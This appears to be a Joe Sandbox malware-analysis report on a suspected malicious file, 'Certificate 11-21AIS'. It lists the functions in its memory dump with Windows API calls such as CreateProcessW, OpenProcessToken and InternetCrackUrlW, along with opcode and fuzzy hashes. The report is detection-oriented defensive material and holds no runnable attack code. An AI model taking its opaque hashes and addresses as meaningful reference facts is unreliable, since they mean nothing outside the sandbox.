                                                                              Function 008E7452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008E7A0D: __getptd_noexit.LIBCMT ref: 008E7A0E
                                                                              • __lock.LIBCMT ref: 008E748F
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 008E74AC
                                                                              • _free.LIBCMT ref: 008E74BF
                                                                              • InterlockedIncrement.KERNEL32(00FB33E0), ref: 008E74D7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                              • String ID:
                                                                              • API String ID: 2704283638-0
                                                                              • Opcode ID: 8269c3704f343e1fcaa59f6e57b8741e5053ea2fbb8b122494a04995c84291cc
                                                                              • Instruction ID: 48a7220fa320f8bdbdb671dbd4a768d8037b8ce699fa85c8b447f15a8b29bb28
                                                                              • Opcode Fuzzy Hash: 8269c3704f343e1fcaa59f6e57b8741e5053ea2fbb8b122494a04995c84291cc
                                                                              • Instruction Fuzzy Hash: CA01A13290A661ABE722AF6B940975DBB60FF47718F144005F818E76C0C7305941DFDB
                                                                              Function 008E7A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __lock.LIBCMT ref: 008E7AD8
                                                                                • Part of subcall function 008E7CF4: __mtinitlocknum.LIBCMT ref: 008E7D06
                                                                                • Part of subcall function 008E7CF4: EnterCriticalSection.KERNEL32(00000000,?,008E7ADD,0000000D), ref: 008E7D1F
                                                                              • InterlockedIncrement.KERNEL32(?), ref: 008E7AE5
                                                                              • __lock.LIBCMT ref: 008E7AF9
                                                                              • ___addlocaleref.LIBCMT ref: 008E7B17
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                              • String ID:
                                                                              • API String ID: 1687444384-0
                                                                              • Opcode ID: 4d130d49497130c32399c03301a85cdda3bf299026e2333d66c6850c47147631
                                                                              • Instruction ID: 92679453e3433782f27b5236cd86684eacebb5b0fd4c2d5da8b1d304989db069
                                                                              • Opcode Fuzzy Hash: 4d130d49497130c32399c03301a85cdda3bf299026e2333d66c6850c47147631
                                                                              • Instruction Fuzzy Hash: C8015B72404B41EED7309F7AC90574AB7E0FF91325F20890EA49AD62A0DBB0A680CB02
                                                                              Function 0092E32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0092E33D
                                                                              • _memset.LIBCMT ref: 0092E34C
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00983D00,00983D44), ref: 0092E37B
                                                                              • CloseHandle.KERNEL32 ref: 0092E38D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$CloseCreateHandleProcess
                                                                              • String ID:
                                                                              • API String ID: 3277943733-0
                                                                              • Opcode ID: bdae09d956b7c25ca2f020e0cdee690bcb07f72c3a8aca7b16ee68bec11b1e82
                                                                              • Instruction ID: 49b8f3bff4da59e1f58bdbc8aafb0af8e0a67ebb8530b184d1be2e4c65c99696
                                                                              • Opcode Fuzzy Hash: bdae09d956b7c25ca2f020e0cdee690bcb07f72c3a8aca7b16ee68bec11b1e82
                                                                              • Instruction Fuzzy Hash: 38F0E2F4221304BEE3102BA5AC45F773E9CEB05F14F008420FE08D62E2D3B19E00A7A8
                                                                              Function 0092EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008DAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 008DAFE3
                                                                                • Part of subcall function 008DAF83: SelectObject.GDI32(?,00000000), ref: 008DAFF2
                                                                                • Part of subcall function 008DAF83: BeginPath.GDI32(?), ref: 008DB009
                                                                                • Part of subcall function 008DAF83: SelectObject.GDI32(?,00000000), ref: 008DB033
                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0092EA8E
                                                                              • LineTo.GDI32(00000000,?,?), ref: 0092EA9B
                                                                              • EndPath.GDI32(00000000), ref: 0092EAAB
                                                                              • StrokePath.GDI32(00000000), ref: 0092EAB9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                              • String ID:
                                                                              • API String ID: 1539411459-0
                                                                              • Opcode ID: 051219ac7713485c9717ac3a88b852dc6dc1e8e0f5e405e980a55ada90b59c54
                                                                              • Instruction ID: e4b56841f10a27d60f6975e94657085e5c1855effb3ea9a574581f6c7f27761e
                                                                              • Opcode Fuzzy Hash: 051219ac7713485c9717ac3a88b852dc6dc1e8e0f5e405e980a55ada90b59c54
                                                                              • Instruction Fuzzy Hash: AAF0823901A269BBDB129FA4AC0EFCE3F1DAF17311F144201FE11611E187B49552EB95
                                                                              Function 008FC82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 008FC84A
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 008FC85D
                                                                              • GetCurrentThreadId.KERNEL32 ref: 008FC864
                                                                              • AttachThreadInput.USER32(00000000), ref: 008FC86B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                              • String ID:
                                                                              • API String ID: 2710830443-0
                                                                              • Opcode ID: bbf35d09d71e50be3dbe5d79fede841d21b35a4391471f30aab6db4c02061e72
                                                                              • Instruction ID: 4966fa7bbe8f4be963b3c9f48e2bb5f25ab25f10f6115c443a97346150d0655a
                                                                              • Opcode Fuzzy Hash: bbf35d09d71e50be3dbe5d79fede841d21b35a4391471f30aab6db4c02061e72
                                                                              • Instruction Fuzzy Hash: B3E0307915622C76DB201B619C0DEDB7F1CEF067A1F008421B60DC4450C6718580D7E0
                                                                              Function 008FB0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentThread.KERNEL32 ref: 008FB0D6
                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,008FAC9D), ref: 008FB0DD
                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008FAC9D), ref: 008FB0EA
                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,008FAC9D), ref: 008FB0F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentOpenProcessThreadToken
                                                                              • String ID:
                                                                              • API String ID: 3974789173-0
                                                                              • Opcode ID: 14904a103281df1938b3a72c29a0161a977ed566e24f2eacad22c7e2d6725114
                                                                              • Instruction ID: 1fe9fd78762b80db13a81ad9c739603461ab0f8bb874d64d1598c04610e44205
                                                                              • Opcode Fuzzy Hash: 14904a103281df1938b3a72c29a0161a977ed566e24f2eacad22c7e2d6725114
                                                                              • Instruction Fuzzy Hash: 1EE0863E7162119BD7201FB19C0CF573BA8FF96795F018828F741D6040DB348401D760
                                                                              Function 008DB47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSysColor.USER32(00000008), ref: 008DB496
                                                                              • SetTextColor.GDI32(?,000000FF), ref: 008DB4A0
                                                                              • SetBkMode.GDI32(?,00000001), ref: 008DB4B5
                                                                              • GetStockObject.GDI32(00000005), ref: 008DB4BD
                                                                              • GetWindowDC.USER32(?,00000000), ref: 0093DE2B
                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0093DE38
                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0093DE51
                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0093DE6A
                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0093DE8A
                                                                              • ReleaseDC.USER32(?,00000000), ref: 0093DE95
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                              • String ID:
                                                                              • API String ID: 1946975507-0
                                                                              • Opcode ID: 08d33e2a1e9710f94c4c1b71d8f5ef6d20d29cfa072a662e6661f3faada72a7f
                                                                              • Instruction ID: aeeef06193a20e77c2a0934c2af7d9baf2a20e6427ae05167e89e7ff695d2644
                                                                              • Opcode Fuzzy Hash: 08d33e2a1e9710f94c4c1b71d8f5ef6d20d29cfa072a662e6661f3faada72a7f
                                                                              • Instruction Fuzzy Hash: 3CE06D39119280AAEB215B64BC09FD83F11AB17339F00C326FABA980E2C7714580EB11
                                                                              Function 0093B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 2889604237-0
                                                                              • Opcode ID: 28c17bb7e285d562376fec65ef8338433382bfca108ba63e1f02260c35fe27e8
                                                                              • Instruction ID: 51c52152681ed9a980b0287059ea90104628b1a25f1b64c26303a9a6bd0088e5
                                                                              • Opcode Fuzzy Hash: 28c17bb7e285d562376fec65ef8338433382bfca108ba63e1f02260c35fe27e8
                                                                              • Instruction Fuzzy Hash: A5E012BD125204EFDB015F70C848A2E7BA8FB4D354F12890AF95A8B210CB789840AB40
                                                                              Function 008FB2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 008FB2DF
                                                                              • UnloadUserProfile.USERENV(?,?), ref: 008FB2EB
                                                                              • CloseHandle.KERNEL32(?), ref: 008FB2F4
                                                                              • CloseHandle.KERNEL32(?), ref: 008FB2FC
                                                                                • Part of subcall function 008FAB24: GetProcessHeap.KERNEL32(00000000,?,008FA848), ref: 008FAB2B
                                                                                • Part of subcall function 008FAB24: HeapFree.KERNEL32(00000000), ref: 008FAB32
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                              • String ID:
                                                                              • API String ID: 146765662-0
                                                                              • Opcode ID: 89aab322d4d137209bc47b1d651a2a4c28ee5274ff08025f81e2614acd921eb0
                                                                              • Instruction ID: 4ce2e227bca223691a8edcfefb8dbd6c0b05a32fd61b936ecef6cfaf6870c1bb
                                                                              • Opcode Fuzzy Hash: 89aab322d4d137209bc47b1d651a2a4c28ee5274ff08025f81e2614acd921eb0
                                                                              • Instruction Fuzzy Hash: 5CE0B67E11A005BBCB022FA5EC08C5DFBA6FF8A7253108221F62581575CB32A871FB91
                                                                              Function 0093B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 2889604237-0
                                                                              • Opcode ID: 48fe6db2bf4ac8c19378d7d28d4aefbfb30daad3d4193f756100e618a532661d
                                                                              • Instruction ID: f077b8ca72e2df8f256a4693318f670af0a947548c3c6621919d1ffa25beab00
                                                                              • Opcode Fuzzy Hash: 48fe6db2bf4ac8c19378d7d28d4aefbfb30daad3d4193f756100e618a532661d
                                                                              • Instruction Fuzzy Hash: B7E046BD525204EFDB019F70C848A2D7BA8FB4D354F12890AF95ACB310CB799800AB40
                                                                              Function 008FDCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 008FDEAA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ContainedObject
                                                                              • String ID: AutoIt3GUI$Container
                                                                              • API String ID: 3565006973-3941886329
                                                                              • Opcode ID: 735f00974f12a9f23d78c6fc06a64e3f434c9d666def8658198067c4e1aa8f7b
                                                                              • Instruction ID: 73c0f0dcda7dcd4c161be49ffdbc35482d6e0c47bf4dcf7680a43e97d17c9c05
                                                                              • Opcode Fuzzy Hash: 735f00974f12a9f23d78c6fc06a64e3f434c9d666def8658198067c4e1aa8f7b
                                                                              • Instruction Fuzzy Hash: 419116746007059FDB24DF64C884F6AB7BAFF49714F248569FA4ACB291DB70E841CB60
                                                                              Function 0090DE7C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008DC6F4: _wcscpy.LIBCMT ref: 008DC717
                                                                                • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                              • __wcsnicmp.LIBCMT ref: 0090DEFD
                                                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0090DFC6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                              • String ID: LPT
                                                                              • API String ID: 3222508074-1350329615
                                                                              • Opcode ID: 0757ff5edbcec849c263cc75d61c5f92f90e0c9128111c1eac52c903c47d3b40
                                                                              • Instruction ID: 7f48168c3853c130712668284e7f72d44d43ed726ecbf201e101e9db17f18e2d
                                                                              • Opcode Fuzzy Hash: 0757ff5edbcec849c263cc75d61c5f92f90e0c9128111c1eac52c903c47d3b40
                                                                              • Instruction Fuzzy Hash: 0E618175A04215AFCB14DF98C895EAEB7B8FF48710F00845AF546AB3D1DB74AE40CB91
                                                                              Function 008DBCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000), ref: 008DBCDA
                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 008DBCF3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalMemorySleepStatus
                                                                              • String ID: @
                                                                              • API String ID: 2783356886-2766056989
                                                                              • Opcode ID: b630ce2dbd1cc2cc86cd7c2259d0213dd86c652c2b558d514df194bb3617475e
                                                                              • Instruction ID: c6a377dd91a00f4637dfb90d33c9ceae96edcf40d81f23cdc43fde52cfa08e47
                                                                              • Opcode Fuzzy Hash: b630ce2dbd1cc2cc86cd7c2259d0213dd86c652c2b558d514df194bb3617475e
                                                                              • Instruction Fuzzy Hash: 74513972418744ABE320AF14DC85BAFBBE8FF94754F41494EF1C8811A6DB7089A88753
                                                                              Function 0090C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008C44ED: __fread_nolock.LIBCMT ref: 008C450B
                                                                              • _wcscmp.LIBCMT ref: 0090C65D
                                                                              • _wcscmp.LIBCMT ref: 0090C670
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscmp$__fread_nolock
                                                                              • String ID: FILE
                                                                              • API String ID: 4029003684-3121273764
                                                                              • Opcode ID: 888080406884e4478635405e1d2e9e565c7cefde8e7789180670a94ebf4d5968
                                                                              • Instruction ID: c46d8dc284d22efaa0270751f6f67038b252bedc754aa2a126af0c367ae013a0
                                                                              • Opcode Fuzzy Hash: 888080406884e4478635405e1d2e9e565c7cefde8e7789180670a94ebf4d5968
                                                                              • Instruction Fuzzy Hash: 4D41D572A0021ABEDF20ABA49C42FEF77BDEF89714F004469F605EB181D6719A448B51
                                                                              Function 0092A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0092A85A
                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0092A86F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: '
                                                                              • API String ID: 3850602802-1997036262
                                                                              • Opcode ID: d9eee25274124fb93d759d5e8e433d6b3c096378f573188c0f5b6e4ba503039a
                                                                              • Instruction ID: 10ab1655911c9bdc7bc1ee418ac45549be9083262565410c5645a4f3547e8316
                                                                              • Opcode Fuzzy Hash: d9eee25274124fb93d759d5e8e433d6b3c096378f573188c0f5b6e4ba503039a
                                                                              • Instruction Fuzzy Hash: 7641F875E013199FDB14DFA8D881BDA7BB9FB08300F14006AE905EB385D770A942DFA5
                                                                              Function 00915180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00915190
                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 009151C6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
